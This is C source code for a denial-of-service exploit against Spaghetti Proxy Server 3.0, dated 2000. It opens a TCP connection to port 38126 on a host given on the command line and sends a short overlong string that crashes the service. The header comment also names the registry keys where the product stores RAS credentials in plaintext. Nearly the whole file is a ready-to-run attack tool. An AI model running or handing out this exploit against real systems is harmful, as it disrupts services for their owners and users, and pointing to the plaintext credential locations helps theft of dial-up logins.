/*
sps3.c - Spaghetti Proxy Server 3.0 DoS attack
(c) Chopsui-cide/MmM '00
The Mad Midget Mafia - http://midgets.box.sk/
Ported to *NIX by Michael Stevens
	http://openbsd.ods.org/

Spaghetti Proxy Server claims to offer "complete security". In
reality, it does the exact opposite. As well as being vulnerable
to a rather simple bug, it stores your RAS username and password in
plaintext in the registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASPassword
and
HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASUserName

This simple program will cause SPS to crash. It does not appear as
though arbitrary code could be execute using this vulnerability.

Usage: sps3 <host>
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>


#define PORT 38126
#define LEN 33

void fatal_error(char *message);
int connect_sock(int sock, char *host, int port);
int create_sock();

main(int argc, char *argv[])
{
	int sock;
	char str[LEN];
	if (argc < 2)
	{
		printf("Usage: sps3	<host>\n");
		exit(0);
	}
	if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) fatal_error("Unable to create socket.");
	connect_sock(sock, argv[1], PORT);
	memset(str, 'X', LEN);
	send(sock, str, LEN, 0);
	usleep(5000); // This may obviously have to be increased.
	close(sock);
	printf("Done\n");
}

int connect_sock(int sock, char *host, int port)
{
	struct sockaddr_in addr;
	struct hostent *he;

	memset(&addr, '0', sizeof(addr));

	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr(host);
	addr.sin_port = htons(port);

	if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
	else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host.");
	if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) fatal_error("Error connecting.");
	printf("Connected to %s:%d\n", host, port);
	return 0;
}

void fatal_error(char *message)
{
	printf("Fatal error: %s\n", message);
	exit(1);
}